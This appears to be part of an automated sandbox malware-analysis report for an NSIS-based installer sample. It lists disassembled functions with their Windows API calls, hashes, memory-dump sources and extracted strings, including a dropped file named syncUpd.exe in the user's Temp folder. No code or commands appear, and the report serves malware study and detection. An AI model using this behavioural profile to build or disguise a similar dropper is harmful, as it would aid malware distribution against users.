                                                                                                                                                                                                                                                              • API String ID: 2738559852-4072043054
                                                                                                                                                                                                                                                              • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                              • API String ID: 3200608346-1684325040
                                                                                                                                                                                                                                                              • Opcode ID: f316a10b61eed65b899ef9fabb196a4043542334212cd6f025015e3779df5493
                                                                                                                                                                                                                                                              • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f316a10b61eed65b899ef9fabb196a4043542334212cd6f025015e3779df5493
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
Similarity
• API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
• String ID: @Vl
• API String ID: 1085758737-658408307
• Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
• Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
• Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
• Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
Similarity
• API ID: ItemMessageSendWindow$ClassDestroyDialogEnableLongMenuShowText
• String ID: NSIS Software Setup
• API String ID: 1257292352-2653429224
• Opcode ID: 0f02577a68e9ff9d90e3bf1c3deeb1ba762514f41c0870b647374f54dc0cec14
• Instruction ID: 81f075938f45a7985b655ae660e62a259a3a74716ec96c8beebe6fa6edba758e
• Opcode Fuzzy Hash: 0f02577a68e9ff9d90e3bf1c3deeb1ba762514f41c0870b647374f54dc0cec14
• Instruction Fuzzy Hash: 4B12EDB0904700EFD720AF69D98876FBBF4EB84714F50893EE88497290D7789885DF5A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• @Vl, xrefs: 004058C5
• Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00405A4A
• #, xrefs: 00405840
Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
Similarity
• API ID: MessageSend$Item$Cursor$ButtonCheckColorExecuteShell
• String ID: #$@Vl$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
• API String ID: 3348721118-4167341434
• Opcode ID: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
• Instruction ID: 44f7cc544d88e5f9b0c99828474254857af221e4d6201ddb95d9c50adba5cc38
• Opcode Fuzzy Hash: 4e383d582a9edf47cc14579e126ee2fdffe76f794733c6ee39e155195205dfec
• Instruction Fuzzy Hash: A5B1E7B0908704AFD710AF69D58876EBBF0FF44314F40892DE889A7381D779A885CF96
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateIndirectRect$BeginBrushClientColorDeleteFillFontModeObjectPaintProcTextWindow
                                                                                                                                                                                                                                                              • String ID: @Vl$NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 2207649800-573637699
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                                                                                                                                                                • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00408822), ref: 00408383
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 0040839D
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrlenA.KERNEL32 ref: 004079CC
                                                                                                                                                                                                                                                                • Part of subcall function 004079B4: lstrcmpiA.KERNEL32 ref: 004079F4
                                                                                                                                                                                                                                                              • GetShortPathNameA.KERNEL32 ref: 004083C8
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004083FF
                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32 ref: 0040845A
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 00408476
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?), ref: 004084A2
                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 00408568
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: GetFileAttributesA.KERNELBASE ref: 00407A85
                                                                                                                                                                                                                                                                • Part of subcall function 00407A78: CreateFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 0040858B
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00408597
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 004085A1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShort$AddressAllocAttributesCreateFreeModulePointerProcReadSizeWritelstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: @Vl
                                                                                                                                                                                                                                                              • API String ID: 1472977481-658408307
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetDlgItem.USER32 ref: 00405CAA
                                                                                                                                                                                                                                                              • SetWindowTextA.USER32 ref: 00405CE6
                                                                                                                                                                                                                                                                • Part of subcall function 00407805: GetDlgItemTextA.USER32 ref: 00407829
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                                • Part of subcall function 00407D37: CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 00405FAC
                                                                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00405FD2
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • A, xrefs: 00405DE1
                                                                                                                                                                                                                                                              • @Vl, xrefs: 00405E0C
                                                                                                                                                                                                                                                              • Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00405E3E, 00405E51
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$ItemText$DiskFreePrevSpaceWindow
                                                                                                                                                                                                                                                              • String ID: @Vl$A$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 2917460849-3607896351
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?), ref: 00407EE6
                                                                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 00407F25
                                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00407FC6
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 00407FEC
                                                                                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32 ref: 00408018
                                                                                                                                                                                                                                                              • SHGetPathFromIDListA.SHELL32 ref: 00408073
                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32 ref: 00408084
                                                                                                                                                                                                                                                                • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: .$Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 3880481140-2519235616
                                                                                                                                                                                                                                                              • Opcode ID: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction ID: afc503830e017d1618816f2a7c40fbe451ee37b9332185e2dde12f9a903aaa14
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41294a1091ea11e90413e40e109157ac56239d1e41f9172e6dff61212ac385df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB918E71D082149FDB20DF69C9846AEBBF4EF48300F55853EE894A7381D738A845CB9B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                              • Opcode ID: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction ID: 1780d8928a2120b8c11af9b20abdfd96f0510a7958c84a0cc1c987df9bbb4b6c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 436651d1fa7a69352c8aa546d6959dfb25c3e8832a7e8f8c86c9d969ad2feb6a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF3128B09047069BDB10DFA8D988A6BBFE4BF48314F04886DFD94DB251D374D941CB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(759205F0), ref: 004034EF
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 0040351C
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00403653
                                                                                                                                                                                                                                                                • Part of subcall function 00403B31: SetFilePointer.KERNELBASE ref: 00403B56
                                                                                                                                                                                                                                                                • Part of subcall function 00403AE9: ReadFile.KERNELBASE ref: 00403B15
                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,00000000), ref: 00403561
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004035D6
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32 ref: 00403606
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00403612
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: SetFilePointer.KERNEL32 ref: 00403D89
                                                                                                                                                                                                                                                                • Part of subcall function 00403D52: ReadFile.KERNELBASE ref: 00403DD5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Global$AllocFreePointerRead$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3222491521-0
                                                                                                                                                                                                                                                              • Opcode ID: 45a2652db95930afc0c21eb3acc2770334267af0a9acbac9f1e064d40d96745d
                                                                                                                                                                                                                                                              • Instruction ID: 4c510bf6e2d4d1f92ab55f121e890243c90c0ce65b69a7146e7506ad40f7442f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45a2652db95930afc0c21eb3acc2770334267af0a9acbac9f1e064d40d96745d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51510BB0A087009FD710EF29C844B6EBBF4AF84315F01896EE598E7391D7389985CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                                              • String ID: +4@$j#@
                                                                                                                                                                                                                                                              • API String ID: 3556499859-900460420
                                                                                                                                                                                                                                                              • Opcode ID: 7e97e4acc74e714af7e785587c95f69a471fbafb9884106baa4076a7f5e25f63
                                                                                                                                                                                                                                                              • Instruction ID: b419fd80023186233bebc3504c041f432485d35e9ebb5b922793ae927fb2013c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e97e4acc74e714af7e785587c95f69a471fbafb9884106baa4076a7f5e25f63
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 263199B5A023009BD7309F76AD88A5A7EA4EB44760750453BEC15A32F0DB7844C2DFDD
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectwsprintf
                                                                                                                                                                                                                                                              • String ID: H$Z
                                                                                                                                                                                                                                                              • API String ID: 1586071882-4221459494
                                                                                                                                                                                                                                                              • Opcode ID: 6ba865e7aa06ec9b82b87e11a18cb297cb487d698daa1d8c739eb9ff96728af6
                                                                                                                                                                                                                                                              • Instruction ID: fe53f9027c55cc81bf00ecbd586396b11bfc2b5e7faefd45710aa59a0b9b721a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ba865e7aa06ec9b82b87e11a18cb297cb487d698daa1d8c739eb9ff96728af6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC218CB29092009FD310BF68DD446AABBF8FB89304F04C97EE088E3251C3B84555CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403A48
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00403A83
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                              • CreateDialogParamA.USER32 ref: 00403AC3
                                                                                                                                                                                                                                                              • ShowWindow.USER32 ref: 00403ADC
                                                                                                                                                                                                                                                                • Part of subcall function 0040392C: MulDiv.KERNEL32 ref: 00403953
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSendWindow$CountCreateDestroyDialogParamShowTextTickwsprintf
                                                                                                                                                                                                                                                              • String ID: o
                                                                                                                                                                                                                                                              • API String ID: 2510787843-252678980
                                                                                                                                                                                                                                                              • Opcode ID: c8bf9b50f24b706e34797b8f036d4915f5a4dc7d81babb649c8bf478da5301e9
                                                                                                                                                                                                                                                              • Instruction ID: 81059e3b479639814b0572c15c12751123e1a1ca33ddd0d88914a755a74492f9
